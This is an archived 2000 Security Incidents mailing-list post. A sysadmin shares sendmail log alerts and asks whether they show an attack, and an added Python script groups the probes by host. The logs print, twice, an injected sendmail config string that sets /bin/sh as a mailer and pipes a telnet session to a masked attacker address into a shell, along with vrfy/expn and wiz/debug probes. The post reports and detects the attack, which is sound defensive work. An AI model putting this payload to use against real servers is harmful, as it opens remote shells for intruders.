Security Incidents mailing list archives
sendmail attack?
From: C <claudiu.ionescu () SCALAJWT RO>
Date: Thu, 14 Dec 2000 09:45:15 +0200
Hi all,

My logcheck came up with the following:

Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh
/tmp/tel.out "
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root
Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root
Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode
Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh
/tmp/tel.out "
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root
Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root
Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode
Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Obviously this is a sendmail attack attempt. Any suggestions, comments?
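Added example, not part of the original post or of logcheck: a Python triage script that reads sendmail syslog lines in the format shown in the message and reports hosts that show several distinct probe types in one log. The function names, the threshold of two probe types, and the sample lines (documentation hostnames and addresses standing in for the masked ones) are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Syslog prefix as it appears in the post: "Dec 9 00:43:01 main sendmail[809]: ..."
LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sendmail\[\d+\]: (?P<msg>.*)$")

# One pattern per message type seen in the post; labels are hypothetical names.
PATTERNS = [
    ("newline-in-string", re.compile(r"POSSIBLE ATTACK from (?P<host>[^\s:]+):")),
    ("vrfy/expn", re.compile(r"NOQUEUE: (?P<host>\S+) \[[^\]]*\]: (?:vrfy|expn) \S+")),
    ("wiz/debug", re.compile(r'"(?:wiz|debug)" command from (?P<host>\S+)')),
]

def classify(line):
    """Return (host, label, timestamp) for a probe line, or None for anything else."""
    m = LINE.match(line)
    if not m:
        return None  # continuation lines and non-sendmail lines are ignored
    for label, pat in PATTERNS:
        hit = pat.search(m["msg"])
        if hit:
            return hit["host"], label, m["ts"]
    return None

def summarize(lines, threshold=2):
    """Map host -> sorted probe labels, for hosts with >= threshold distinct types."""
    seen = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result:
            seen[result[0]].add(result[1])
    return {h: sorted(kinds) for h, kinds in seen.items() if len(kinds) >= threshold}

# Constructed sample lines modelled on the log in the post (not real data).
SAMPLE = [
    'Dec  9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from dial22.example.net: newline in string "iss^M ..."',
    'Dec  9 01:01:05 main sendmail[856]: NOQUEUE: dial22.example.net [192.0.2.22]: vrfy root',
    'Dec  9 01:01:06 main sendmail[858]: NOQUEUE: dial22.example.net [192.0.2.22]: expn decode',
    'Dec  9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from dial22.example.net [192.0.2.22] (192.0.2.22)',
    'Dec  9 01:01:24 main sendmail[863]: BAA00863: "debug" command from dial22.example.net [192.0.2.22] (192.0.2.22)',
    'Dec  9 02:10:00 main sendmail[901]: NOQUEUE: mx.example.org [198.51.100.7]: vrfy postmaster',
    'Dec  9 02:11:00 main sendmail[910]: CAA00910: from=<a@example.org>, size=512, nrcpts=1',
]

if __name__ == "__main__":
    for host, kinds in summarize(SAMPLE).items():
        print(f"{host}: {', '.join(kinds)}")
```

A single vrfy from one host stays below the threshold, while the combination of config-injection string, address enumeration and the old wiz/debug commands from one source is reported as a scan.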